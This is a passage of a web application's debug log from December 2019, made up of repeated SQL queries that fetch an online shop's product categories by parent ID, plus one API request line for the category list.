"shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:34:00,002 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:34:00,004 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:34:00,007 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:34:00,009 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:34:00,011 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:34:00,013 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:34:00,017 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:34:00,019 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:34:00,021 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:34:00,023 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:34:00,026 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:34:00,029 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:34:00,031 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:34:00,033 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:34:00,035 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:34:00,038 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:34:00,041 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:34:00,044 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:34:00,046 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:34:00,048 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:34:00,050 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:34:00,052 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:34:00,057 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:34:00,062 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:34:00,065 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:34:00,067 utils 32059 139875701085952 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:34:00,068 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:34:00,078 utils 32059 139875701085952 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:34:00,082 utils 32059 139875690596096 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-27 07:34:00,082 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:34:00,086 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [27/Dec/2019 07:34:00] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:34:00,089 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:34:00,091 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:34:00,094 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:34:00,096 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:34:00,098 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:34:00,103 utils 32059 139875701085952 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:34:00,105 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:34:00,108 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:34:00,110 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:34:00,113 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:34:00,116 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:34:00,118 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:34:00,121 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:34:00,123 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:34:00,125 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:34:00,129 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:34:00,131 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:34:00,134 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:34:00,136 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:34:00,138 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:34:00,140 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:34:00,144 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:34:00,147 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:34:00,151 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:34:00,153 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:34:00,156 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:34:00,161 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:34:00,164 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:34:00,167 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:34:00,171 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:34:00,174 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:34:00,177 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:34:00,180 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:34:00,182 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:34:00,184 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:34:00,186 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER 